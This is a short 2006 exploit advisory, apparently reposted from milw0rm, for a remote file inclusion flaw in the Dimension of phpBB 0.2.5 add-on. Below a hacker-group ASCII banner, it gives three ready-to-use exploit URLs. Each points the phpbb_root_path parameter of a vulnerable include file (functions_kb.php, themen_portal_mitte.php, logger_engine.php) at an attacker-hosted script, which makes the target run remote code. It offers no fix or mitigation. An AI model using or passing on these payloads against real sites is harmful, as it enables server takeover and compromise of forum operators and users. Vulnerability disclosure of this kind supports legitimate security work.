Dimension of phpBB <= 0.2.5 (phpbb_root_path) Remote File Includes

2006-10-08T00:00:00
ID SECURITYVULNS:DOC:14592
Type securityvulns
Reporter Securityvulns
Modified 2006-10-08T00:00:00

Description


       /      \
    \  \  ,,  /  /
     '-.`\()/`.-'
    .--_'(  )'_--.
   / /` /`""`\ `\ \           * SpiderZ Hacking Security *
    |  |  ><  |  |
    \  \      /  /
        '.__.'

Author: SpiderZ

Dimension of phpBB Remote File Inclusion Vulnerability

For: Dimension of phpBB 0.2.5 (phpBB 2.0.21)

Site: www.spiderz.altervista.org

Site02: www.spiderz.netsons.org


Remote File Inclusion

http://site.com/[path]/includes/functions_kb.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/themen_portal_mitte.php?phpbb_root_path=http://[Evil_script]

http://site.com/[path]/includes/logger_engine.php?phpbb_root_path=http://[Evil_script]


Download: http://www.phpbb-dimension.de/dload.php?action=category&cat_id=16


milw0rm.com [2006-10-05]